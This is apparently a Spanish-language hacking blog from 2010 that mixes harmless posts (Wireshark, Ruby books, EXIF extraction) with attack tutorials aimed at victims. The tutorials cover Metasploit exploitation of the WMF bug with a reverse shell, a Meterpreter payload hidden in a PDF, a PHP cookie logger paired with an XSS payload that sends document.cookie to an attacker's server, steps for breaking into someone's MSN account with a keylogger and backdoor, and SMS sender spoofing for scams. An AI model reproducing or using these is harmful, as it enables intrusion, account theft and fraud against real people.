1 de diciembre de 2010

Mi escritorio del Mes

Bueno pz esta vez les vengo mostrando lo que seria mi escritorio de este mes, Asi mismo estare subiendo mis escritorios personalizados cada mes. Si alguien quiere y desea compartir su escritorio con los demas lo puede hacer aqui solo ponganse en contacto con migo y con gusto los unire.
Requisitos pa mostrar tu Escritorio:
  • Tener una distribucion Unix Linux.
  • Tener entorno Gnome

23 de octubre de 2010

¿Me dices que puertos tengo abiertos?


La eterna pregunta que en algún momento dado todos hemos hecho; bien sea porque andamos configurando una red ajena y queremos averiguar que puertos estamos exponiendo al exterior, pero no tenemos acceso a una maquina bajo nuestro control, o incluso trabajando, por no tener acceso al exterior salvo mediante un proxy.

En esos momentos, siempre viene bien encontrar conectado a alguien que nos pueda hacer "el trabajito" pero no siempre hay un alma caritativa online para ese menester. En esos casos viene muy muy bien la pagina web que quería presentar hoy: linux-sec.

Esta pagina web permite usar un nmap de forma remota y totalmente gratis. Una vez parametrizado el tipo de scaneo que necesitamos, lo lanzamos y nos devuelve el resultado del scaneo de puertos como si hubiéramos usado nuestro propio Nmap.

Seguro que puede sacar a mas de uno de un apuro ! Eso si, usadlo con moderación, es un servicio muy muy interesante y seria una pena que cesara por un uso indebido
Bueno esto es todo Saludos!! xD

16 de octubre de 2010

Wireshark, instalación y conceptos básicos por Mask

logo wireshark 
Wireshark es un capturador/analizador de paquetes de red (llamado a veces, sniffer o esnifer). Wireshark te permitirá ver, aun nivel bajo y detallado, qué está pasando en tu red. Además es gratuito, open source, y multiplataforma. Sin duda la mejor opción al momento de auditar nuestra red.
Posee una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras)

¿Para que/quien es util Wireshark?

  • Administradores lo usan para resolver problemas en la red
  • Ingenieros lo usan para examinar problemas de seguridad
  • Desarrolladores lo usan para depurar la implementación de los protocolos de red
  • Estudiantes los usan para aprender internamente cómo funciona una red

Características de Wireshark

  • Disponible para Linux y Windows
  • Captura de paquetes en vivo desde una intefaz de red
  • Muestra los paquetes con información detallada de los mismos
  • Abre y guarda paquetes capturados
  • Importar y exportar paquetes en diferentes formatos
  • Filtrado de información de paquetes
  • Resaltado de paquetes dependiendo el filtro
  • Crear estadísticas

Instalación de Wireshark (Terminal)

La verdad es que lo tienes muy fácil si usas Debian o sus derivados (Ubuntu, por ejemplo). Tan solo debes hacer lo de siempre:
sudo apt-get install wireshark
Y ya está! Además la mayoría de las distribuciones lo incluyen en sus repositorios, por lo que lo tienes fácil en openSuse, Fedora, o Gentoo. Por ejemplo, en Gentoo:
USE=”adns gtk ipv6 portaudio snmp ssl kerberos threads selinux” emerge wireshark
O FreeBSD:
pkg_add -r wireshark
Sin embargo, si lo que deseas/necesitas es instalarlo desde las fuentes, vamos por ello:

Instalación del Wireshark desde el tarball

Antes que nada, para poder compilar correctamente Wireshark debes tener dos cosas:
  • Gtk+ y Glib, que puedes descargar de www.gtk.org
  • libpcap, las librerías para captura de paquetes que Wireshark usa. La puedes encontrar en www.tcpdump.org
Ahora, debes descargar el código fuente de la página oficial descomprimirlo e instalarlo:
tar zxvf wireshark-1.0.3.tar.gz
cd wireshark-1.0.3/
./configure
make
sudo make install
Problemas experimentados: personalmente tuve que instalar manualmente bison, flex y gtk+; en muchos sistemas no es necesario, pero mejor que estés preparado.

Entendiendo la interfaz gráfica de Wireshark

Luego de la instalación podrás iniciar el programa con el comando wireshark:


La interfaz gráfica de Wireshark está principalmente dividida en las siguientes secciones (de arriba a abajo):
  • La barra de herramientas, donde tienes todas las opciones a realizar sobre la pre y pos captura.
  • La barra de herramientas principal, donde tienes las opciones más usadas en Wireshark.
  • La barra de filtros, donde podrás aplicar filtros a la captura actual de manera rápida
  • El listado de paquetes, que muestra un resumen de cada paquete que es capturado por Wireshark
  • El panel de detalles de paquetes que, una vez seleccionado un paquete en el listado de paquetes, muestra información detallada del mismo
  • El panel de bytes de paquetes, que muestra los bytes del paquete seleccionado, y resalta los bytes correspondientes al campo seleccionado en el panel de detalles de paquetes.
  • La barra de estado, que muestra algo de información acerca del estado actual de Wireshark y la captura.

9 de octubre de 2010

Como instalar Metasploits framework en Windows por Mask

Aclaro que esto fue hecho de una manera rápida, por lo consiguiente quiero pedir una disculpa adelantada por las burradas que en su elaboración pueda haber llegado a cometer, este minitutorial, explica como se lleva a cabo la explotación del bug (tan comentado) en los archivos WMF ocupando el Metasploit, quiero aclarar que lo que todo lo explicado a continuación se ha escrito con motivos de conocimientos y aprendisaje. haha..!!

ya que MetaSploit es bastante novedoso, no muchos saben usarlo, así que aquí va un minitutorialpara el uso y la aplicación de el exploit:

Param comenzar, tendremos que bajarlo e instalarlo (no creo que haya problema con esto...)
http://www.metasploit.com/tools/framework-2.5.exe


esta versión (2.5) es para windows y está escrita en PERL, si buscas la versión para linux puedes buscar la versión 3.0, escrita en RUBY y con algunas mejoras.

bueno, una vez terminada la instalación del metasploit aparecerá la consola principal del programa, por ahora no la necesitaremos, así que la puedes cerrar.

llegados a este punto tenemos que hacer la actualización del metasploit, dirígete hacia el menú del metasploit (Inicio / Todos los Programas / Metasploit Framework) y busca MSFupdate, córrelo y confirma que se desea iniciar la actualización (yes)..
bien, ahora tendremos que repetir el proceso de actualización (ya que esta vez pediremos la actualiuzación de la base de datos de exploits), de esta manera se nos descargará una lista con los exploits nuevos y que tu versión de MetaSploit no tiene...
bueno, entre esta actualización debe de venir el exploit "ie_xp_pfv_metafile", que es el que en este momento ocuparemos como referencia.

una vez terminada la actualización llegó la hora de entrar a la configuración del exploit.. ahora tendremos que elegir que es lo que deseamos utilizar..

Citar
--modo web
o
Citar
--modo consola

en lo personal no me gusta el modo web por lo que les he explicado arriba, así que pasaré a explicar el modo consola (llámenme nostálgico  :cry: Pinguinitoooooooooooo.... no, no, Toritoooooo xDDDD)... aunque una vez entendido el modo consola, no creo que les cueste más entender el modo web basta con entrar en para iniciar el servidor y entrar desde cualquier navegador a http://127.0.0.1:55555...

ok ya que solo es una pequeña demostración de lo que se puede hacer con el MetaSploit paso a explicar los comandos básicos para probar el exploit que se comenta en el post...

Bien; una vez en la consola de comandos se pasa a configurar el programa de la siguiente manera...

msf >

Código:
show exploits  

*para que nos muestre los exploits actuales en la base de datos del programa, entre estos debemos hayar nuestro exploit "ie_xp_pfv_metafile".

msf >
Código:
use ie_xp_pfv_metafile
*esto es para cargar cargar el exploit

msf use ie_xp_pfv_metafile >
Código:
Set LHOST Tu-IP

*ya que utilizaremos una reverse_conect, tendremos que especificar hacia donde se dirigirá la conexión (hasta nosotros)

msf use ie_xp_pfv_metafile >
Código:
Set PAYLOAD Win32_reverse

*así indicaremos que nuestra conexión será de tipo Reverse_Conect (para ver una lista completa de las conexiones que puedes usar teclea Show payloads, todo depende directamente si el expoit permite esto o no).

msf use ie_xp_pfv_metafile
Código:
set RHOST Ip-Víctima 
*solo nos resta colocar a la víctima...

msf use ie_xp_pfv_metafile
Código:
Exploit
*así indicamos que el exploit está listo y que se debe de ejecutar...

El programa nos indica que se ha puesto a la escuecha el puerto 8080 en nuestro servidor xxx.xxx.xxx.xxx con algo como

ahora solo resta esperar a que la víctima se conecte a nuestro servidor, cuando esto suceda, la Víctima no recibirá respuesta por parte de el server del atacante, sin embargo, el Visor de imágenes y fax de Windows se la abrirá y cargará como si estuviera esperando por cargar algo, si cierra esta ventana, el Metaspoit nos avisará con algo como <>, pero la shell quedará activa...

bien creo que es todo, cabe mensionar que esto ya no es tan bueno como cuando se descubrió, ya que ahora la mayoría de los antivirus lo detectan y como dijo philos y GTO, ya hay un parche no oficial y para el miércoles sale el oficial...

Tips:

  • En caso de tener una Ip Dinámica siempre está el "NO - IP" que hace maravillas  
  • si lo que haremos es usar la ingeniería social siempre podemos adquirir un free Domain en servidores como <.Tk>, <.cjb.net> etc..

espero les haya gustado y sobre todo SERVIDO.. y como siempre cabe mencionar que el uso de esta información es puramente educativo y pedir una disculpa por las babosadas que he cometido durante la elaboración del texto haha..!!

 Salidos xD

5 de octubre de 2010

Juego para Programadores | LightBot


Este es el primer juego que pongo en este Blog. Se trata de un juego de lógica llamado LightBot donde nos hará falta nuestro instinto de programadores para resolver los puzzles .El juego consiste basicamente en programar un pequeño robot con las intrucciones necsarias para quer pueda recorer too el circuito.
Las instrucciones son muy pocas pero nos sobran para lo que quieremos hacer, avanzar, saltar, girar, encender la luz. Permite crear funciones para agilizar las pruebas y hacer recursividad de ellas.
LightBot

4 de octubre de 2010

Embebiendo un Ejecutable dentro de un PDF con MetaSploit por Mask

En este artículo, vamos a ver como embeber un archivo ejecutable “.exe”, dentro de un archivo PDF, utilizando el módulo “adobe_pdf_embedded_exe” de MetaSploit.
Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.

MetaSploit: adobe_pdf_embedded_exe
Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo “adobe_pdf_embedded_exe” de MetaSploit, en donde vamos a embeber un archivo ejecutable “.exe”, o un payload de MetaSploit, dentro de un archivo PDF.

Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

Lo interesante del módulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF’s existentes de una víctima en particular en Google:

 
Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables haha..!!


Embebiendo un Payload de MetaSploit en un PDF
Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción “INFILENAME” vamos a poner el path al archivo PDF que queremos utilizar, y en la opción “FILENAME”, el nombre del nuevo archivo PDF con el payload embebido:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit
Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E

Cuando la víctima abra el archivo PDF, verá un warning:



Al momento de presion “Open”, el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de “Desktop”, “My Documents” y “Documents”.

Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios “Escritorio” y “Mis Documentos”, y volver a generar el PDF:
# editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:
 

Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: “start programa.pdf”.
El archivo que enviamos a la víctima se llamaba “evil.pdf”, cuando dropeo el payload lo hizo con el nombre “programa.pdf”, como el nombre del PDF verdadero que configuramos oportunamente. En realidad, “programa.pdf” es un archivo “.exe”, con el payload de Meterpreter, pero como el comando “start” puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.

Embebiendo un Ejecutable en un PDF
Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción “EXENAME”. En este caso estamos embebiendo la famosa calculadora de Windows “calc.exe”:
set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit 

Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable “calc.exe”, por alguna razón si no lo configuramos no nos deja seguir.
set PAYLOAD windows/shell/bind_tcp
Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:
 
 
Una vez que la víctima presione “Open”, se correrá el archivo ejecutable que embebimos, el famoso “calc.exe”:
 
Eso es todo amigos espero y hayan entendido, de lo contrario Posteenlo aqui mismo xD 

3 de octubre de 2010

Ruby - Si queremos Programar el Metaspl0it por Mask

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.

Ruby CookBook - Click Aquí

Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.

Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.

Bueno esto  es todo espero y les sirva xD haha..!!

Extraer metadatos de imagenes con php por Mask

¿Que aprenderemos hoy?
a saber si una foto a sido retocada, y poder ver la imagen original. Bien los meta-datos son  Información que se guarda automáticamente al generar un archivo: .doc, .jpg,etc. y que no son visibles al ojo humano. Esta información la genera el software que se utilizo para crear el archivo en el caso de las fotos, por ejemplo la genera el software de la cámara fotográfica ( solo si es digital ¬¬). haha..!!
en el caso de las fotografiás un tipo de meta-datos son los EXIF.

bien los meta-datos EXIF contienen información importante como : fecha original, modelo de la cámara,etc. pero lo mas importante y en lo que se fijara este post es extraer el "THUMBNAIL" original.

Para los que no sabían cada vez que se modifica una imagen se guarda una copia en miniatura de la original que no se podría observar a simple vista, pero con algo de código podremos extraerlo.

Ejemplo:



aquí vemos una foto trucada y a su lado el thumbnail extraido ( la foto original)

¿Como la extraemos con PHP ?
con exif_thumbnail:
eh aquí un pequeño código el cual puedes modificar:


<?php
set_time_limit ( 0 );
function getmicrotime () {
$temparray = split ( " " , microtime ());
$returntime = $temparray [ 0 ]+ $temparray [ 1 ];
return $returntime ;
}


$maindir = "." ;
$mydir = opendir ( $maindir ) ;
$starttime = getmicrotime ();
$i = 0 ;
while( $fn = readdir ( $mydir ))
{
$startimagetime = getmicrotime ();
$ext = strtolower ( substr ( $fn , strlen ( $fn )- 3 ));
if ( $ext == "jpg" ) {
$i ++;
echo $fn . " se proceso satisfactorio<br>" ;
flush ();
$image = exif_thumbnail ( $fn , $width , $height , $type );
if ( $image !== false ) {
$handle = fopen ( $fn . ".thumb.jpg" , 'a' );
echo "<img src='".$fn."' width='400' height='301' />";
echo "<img src='".$fn .".thumb.jpg' width='400' height='301' />";
fwrite ( $handle , $image );
} else {
echo "imagen de miniatura no disponible para: " . $fn . "<br>" ;
echo "<img src='".$fn.".thumb.jpg' width='400' height='301' />";
}
}
}
closedir ( $mydir );
$endtime = getmicrotime ();
echo "<br>Tiempo tardado " ;
print $endtime - $starttime ;
echo "<br> Imagenes procesadas: " . $i ;
?>
simplemente montalo en localhost, mete las fotos en la carpeta raíz y  voilá  , podrás ver las fotos originales .
haha..!!

1 de octubre de 2010

Robando Cookies con un Xss por Mask

http://rogunix.siften.com/wp-content/uploads/2010/08/xss.jpg
 Que tal amigos de CorporatiOn StudiOs bueno pz hoy vengo con un nuevo tutorial hehe..!! hoy les enseñare como robar cokies con xss haha..!!  Esto es muy viejo sin embargo me gusta ponerlo para queno se pierda el sentido de que hay contenido arcaico pero útil en la Comunidad haha..!!
Primero debemos de conseguir una web vulnerable a Xss de preferencia usen una que no moleste tanto algo asi como una que sea 100% vulnerable que pueda mostrar cookies y mas, tambien vamos a necesitar un Servidor Web que permita PHP ;)

Ahora si miren les diré el funcionamiento nosotros vamos a crear un archivo donde se guarden las cookies, lo llamaremos almacen.txt ;) mm ahora necesitamos hacer que los datos se guarden ahi y como hacemos eso? pues hay que crear un script en PHP que haga la función.

Ahora nuestro code será
<?php
$ip = $_Server['REMOTE_ADDR'];
$co = $_GET[c];
$datos = "ip: " . $ip . "cookie: " . $co . "<br>" . "CorporatiOn StudiOs";
$archivo = fopen('almacen.txt', 'a');
fwrite($archivo,$datos);
fclose($archivo);
header("Location: http://webtuya.com");
?>


lo pondremos en el mismo directorio que el almacen.txt y lo guardaremos como rob.php

Bueno con ese code se roban las cookies y se obtiene la ip de la víctima... ustedes pueden personalizar el documento para que cojan mas cosas de la víctima, ahora ustedes lo que tienen que hacer es generar un xss con window.location...

window.location='http://miweb.com/rob.php?c='+document.cookie;

Ahora si ya estamos completos o casi solo falta completar... con un ejemplo

http://www.webvulnerableatodo.com/buscador.php?palabra=

en algunos casos podemos variar y poner document.location en ves de window.location. Espero les haya gustado el tuto, dudas o cualquier cosa pues comenten. haha..!! xD

El famoso "Como Hackear msn por Mask

Les queiro hablar esta ves sobre un fenómeno que me ha tenido un poco inquieto por los ultimos muchos años... desde que empese en la seguridad informática aquellos que no conocian de este tema siempre me decian enseñame a hackear msn y ese tipo de cosas, este articulo va para aquellos que quería aprender y nunca pudieron, pero se los voy a enseñar de una manera que solo puedan entender con previo conocimiento haha..!!


 
1.- Deben de Conseguir la IP de la persona.

2.- Consigan un Bruter de Conexion por puerto, de preferencia haganlo ustedes para que depues no le hechen la culpa al programa ;).

3.- Una ves que hayan conseguido acceso pues es facil usen un programa que sirva como keylogger o escriban el codigo ustedes mismo para que no le hechen la culpa al programa.

4.- Instalenle el keylogger a la víctima por algun lugar que ustedes quieran de preferencia con un Binder cojan un archivo del system32 para que no se arriesgue a borrar nada ;)

5.- Espera un tiempo a que tu víctima consiga escribr su pass.

6.- Vean la Pass en el archivo donde se tienen que guardar segun su programa.

7.- Dejenle un backdoor para cualquier tipo de inconveniente que tengan ustedes con la pass.

8.- Descarguense el Pidgin y/o Amsn y pueden intentar conectarse y podran conectarse normalmente.

9.- Vayan a la página de hotmail y cambien la pass de su víctima, hagan su fechoría

10.- Luego cada ves que quieran monitorearla pues usen el Backdoor que dejaron.
 
Nota: Muchas empresas usan una especie de sistema parecido claro que obviando siertas cosas para conocer cuando un empleado los quiere traicionar o hace algo ilegal por su mail privado.

Como Cuidarse:
Siempre dejen Su Firewall Prendido, Usen programas u otros firewalls que protejan su equipo de conexiones remotas, usen contraseñas largas para el login de su windows y su router.
 
Bueno me despido y un gran saludo ami amigo Tro1l

23 de septiembre de 2010

Instalar Metasploit en linux (ubuntu) por Mask

¿Que es metasploit framework?

El Proyecto Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.
Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota.
En pocas palabras metasploit es una utilidad que nos facilita la intrusion a equipos por medio de exploits


¿Como instalarlo?

Bueno para instalar metasploit en linux o en ubuntu 10.04 como voy hacer yo solo tenemos que seguir los siguientes pasos
Antes que nada debemos instalar las librerias que necesita metasploit para su correcto funcionamiento, solo abran una terminal y ejecuten los siguientes comandos uno por uno
sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems
sudo apt-get install libmysqlclient-dev
Cuando los instalen todos nos metemos a la pagina de metasploit y descargamos metasploit
Click aqui para descargar Cuando esten dentro escojen entre la estructuras de 32 bits o 64 bits    ( Normalmente los computadores son de 32 bits, pero si no la conocen descargen la de 32 bits)
NOTA: no se descargen la version minilinux amenos que su pc sea muy antigua y use un linux antiguo
Cuando se descargen metasploit abrimos una terminal y nos ubicamos en la carpeta donde se descargo metasploit, normalmente esta en la carpeta Descargas
una vez dentro ejecutamos el comando
sudo sh ./framework-3.4.1-linux-i686.run
“segun la version del metasploit cambia el nombre, solo vean el nombre del archivo que descargaron y vean que este bn escrito”
Y dan enter, alli empezara la instalacion,
Empezaran a salir una opciones, escribimos yes en todas las opciones y damos enter.
las opciones que salen dice: que si desea crear la carpeta de instalacion, desea que metasploit se actualize, desea actualiza metasploit ahora.
como le dieron yes a todo metasploit se actualizara automaticamente cuando termine la instalacion.
Ahora para ejecutarlo escriben en terminal el siguiente comando:
sudo msfconsole
esperan unos segundos y tendran corriendo metasploit, Ahora le tienen que indicar que base de datos usar, asi que teclean dentro de metasploit:
db_driver sqlite3
les tendra que mostrar la siguiente salida: [*] Using database driver sqlite3
con esto ya pueden usar metasploit para pentests
Esto es todo.
CUALQUIER DUDA O COMENTARIO POSTEENLO EN ESTE MISMO POST

De la mitad de las aplicaciones tienen nivel de seguridad pobre

Bug
Más de la mitad de las aplicaciones tienen un nivel de seguridad pobre 
Según ha revelado un nuevo informe de la firma de seguridad Veracode, la cual ha analizado más de 2,900 aplicaciones, el 57% del software de escritorio tiene un nivel de seguridad por por debajo de lo que puede considerarse aceptable.
El dato es igual de alarmante con aplicaciones web, pues Veracode encontró que 8 de cada 10 aplicaciones en la nube no cumple lo mínimos de seguridad.
El tipo de vulnerabilidad más común sigue siendo el cross-site scripting (XSS), representando el 51% de todas las fallas de seguridad descubiertas. Veracode destaca que las aplicaciones desarrolladas sobre .NET son las que han mostrado verse más afectadas por este tipo de fallas, seguido de las aplicaciones Java.
Sin embargo, el informe también señala que las vulnerabilidades están siendo corregidas más rápido que nunca. El tiempo promedio que le toma a los fabricantes solucionar vulnerabilidades en sus aplicaciones ha pasado de 32-82 días a sólo 16 días, lo que indica las compañías finalmente están poniendo mucha más atención en estas cuestiones y están usando mejores herramientas.

(vía: Help Net Security)

19 de septiembre de 2010

SMS Spoofing por Mask

Imaginemos que un día nos llega un sms de un número el cual ya está asociado a nuestro móvil, nunca dudaríamos que el mensaje viene del celular de esta persona de la cual aparece su número , total es lo mas normal .
Pero imaginemos que el mensaje no viene de ese celular si no que fue falseado por un tercero?, piensan en las grandes posibilidades que podría dar esta especie de técnica?
Desde una simple broma hasta un fraude via SMS.
Pongámonos en el caso que nos llega un sms supuesta mente desde un numero de nuestra compañía de servicio móvil indicándonos llamar a un numero especifico por que “ganamos una promoción” , esta técnica con un poco de ingeniería social se podría usar para estafar y engañar usuarios incautos con supuestas promociones o hasta para hacer spam.
Bien como funciona esto?
Sabemos que los sms no van directamente de un celular a otro si no pasan por una serie de “GATEWAYS” los cuales también pueden almacenar nuestro SMS, en conclusión los SMS no tienen nada de seguro , y peor aun desde que las infraestructuras de las compañías para mandar SMS están conectadas a internet para poder mandar SMS desde ahí , los SMS no validan siempre de que móvil vienen , esto puede ser utilizado para falsificar SMS con algunos servicios disponibles en internet y hasta gratuitos como lo son:
Lleida.NET que te da algunos créditos de demo , comencemos con este servicio:
Una vez registrado en:
http://smsmasivo.lleida.net/es/alta.html
nos llegara al correo un mail con los datos de acceso los cuales tenemos que logarlos en:
http://websms.lleida.net/

Que es la web desde donde mandaremos los sms


Bien aremos un Ejemplo;

Escribimos los sms con código internacional es decir para Perú:
+511993210000
El + es el símbolo internacional
51 es código de Perú
1 es código de ciudad de Lima
993210000 es el numero de celular
En teléfono/s:
Escribimos el numero o los números a los que llegara el SMS.
En Remitente el numero que falsificaremos para que llegue como si fuera de el:
Las otras opciones son irrelevantes.
Y así habremos falsificado el remitente de un SMS
Denle buen uso :D
Saludos

Welcome

Hola que tal a todos los de CorporatiOn StudiOs Les doy la bienvenida ami blog, aqui discutire los temas mas importantes e impresindibles que todo Informatico debe saber y estar al tanto de cada uno de estos temas, Por ejemplo La Explotacion de vulnerabilidades en la Web, S.O y muchas mas cosas, Aqui les enseñare a como sacar partido de todo esto claro Todo esto con fines Educativos. Espero y sea de su agrado cualquier sugerencia contacteme en CorporatiOn StudiOs